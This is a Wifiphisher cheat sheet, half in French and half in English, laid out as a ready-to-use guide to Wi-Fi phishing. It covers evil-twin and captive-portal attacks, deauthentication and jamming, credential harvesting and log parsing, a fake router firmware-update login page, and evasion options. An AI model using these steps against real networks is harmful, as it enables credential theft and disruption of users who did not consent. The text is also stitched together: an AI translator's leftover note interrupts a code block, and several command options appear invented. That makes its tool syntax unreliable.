Feuille de Triche Wifiphisher Wireless Phishing Framework

Aperçu

Wifiphisher est un framework de point d’accès malveillant pour mener des engagements de red team ou des tests de sécurité Wi-Fi. Il crée de faux réseaux sans fil pour effectuer des attaques de phishing automatisées contre des clients sans fil, capturant des identifiants et réalisant des attaques de type man-in-the-middle.

⚠️ Avertissement : Cet outil est destiné uniquement aux tests d’intrusion autorisés et aux évaluations de sécurité sans fil. Assurez-vous d’avoir une autorisation appropriée avant de l’utiliser dans tout environnement.

Installation

Kali Linux

# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Installation Manuelle

# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Installation Docker

# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Utilisation de Base

Attaque Simple de Point d’Accès Malveillant

# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Gestion des Interfaces

# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Référence des Commandes

Options de Base

Option	Description
-t, --target	Réseau cible ESSID
-i, --interface	Interface sans fil
-jI, --jam-interface	Interface de brouillage
-p, --phishing-scenario	Modèle de phishing
-pK, --presharedkey	Clé pré-partagée WPA/WPA2
-qS, --quitonsuccess	Quitter la capture des identifiants

Options Avancées

Option	Description
-aI, --apinterface	Interface AP
-nJ, --nojamming	Désactiver le brouillage
-e, --essid	Point d’Accès ESSID
-dE, --deauth-essid	Déauthentification ESSID spécifique
-dC, --deauth-channels	Canaux de déauthentification
-nE, --noextensions	Désactiver les extensions

Options de Journalisation

Option	Description
-l, --logging	Activer la journalisation
-lP, --log-path	Chemin du fichier journal
-cP, --credential-log-path	Chemin du journal des identifiants
-lC, --log-credentials	Journaliser les identifiants capturés

Modèles de Phishing

Modèles Disponibles

# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Modèle de Mise à Jour du Firmware

# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

Modèle de Connexion OAuth

# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Création de Modèle Personnalisé

# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Configuration du Modèle (config.ini)

[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = \\\\{ESSID\\\\}
MAC = \\\\{MAC\\\\}
CHANNEL = \\\\{CHANNEL\\\\}

Attaques Avancées

Attaque Jumelle Malveillante

# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6

Attaque de Portail Captif

# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

Capture de Handshake WPA/WPA2

# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Attaque Karma

# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Brouillage et Déauthentification

Déauthentification Ciblée

Note: I’ve translated the text while preserving markdown formatting, keeping technical terms in English, and maintaining the structure. The placeholders for sections 3-20 are left empty as no specific text was provided for translation.```bash

Deauth specific network

sudo wifiphisher -dE “Target_Network”

Deauth specific client

sudo wifiphisher -dC 00:11:22:33:44:55

Deauth on specific channels

sudo wifiphisher —deauth-channels 1,6,11

### Jamming Configuration
```bash
# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Smart Jamming

# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5

Extensions and Plugins

Available Extensions

# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Credential Harvester

# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Handshake Capture Extension

# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Custom Template Development

HTML Template Structure

<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: \\\\{ESSID\\\\}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

/* style.css */
body \\\\{
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
\\\\}

.container \\\\{
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
\\\\}

input \\\\{
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
\\\\}

button \\\\{
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
\\\\}

JavaScript Functionality

// script.js
document.addEventListener('DOMContentLoaded', function() \\\\{
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) \\\\{
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;

        if (!username||!password) \\\\{
            e.preventDefault();
            alert('Please enter both username and password');
        \\\\}
    \\\\});

    // Simulate loading
    setTimeout(function() \\\\{
        document.querySelector('.container').style.opacity = '1';
    \\\\}, 500);
\\\\});

Monitoring and Logging

Real-time Monitoring

# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Credential Logging

# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4

Traffic Analysis

# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Evasion Techniques

MAC Address Randomization

# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Channel Hopping

# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Timing Evasion

# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Troubleshooting

Interface Issues

# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list|grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Permission Issues

# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Dependency Issues

# Check Python dependencies
pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l|grep -E "(hostapd|dnsmasq)"

Network Issues

# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Legal and Ethical Considerations

Authorization Requirements

# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Best Practices

# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines

Resources

• Wifiphisher GitHub Repository
• Wifiphisher Documentation
• Wireless Security Testing Guide
• WiFi Penetration Testing
• Wireless Network Security

---

This cheat sheet provides a comprehensive reference for using Wifiphisher. Always ensure you have proper authorization before conducting wireless security assessments.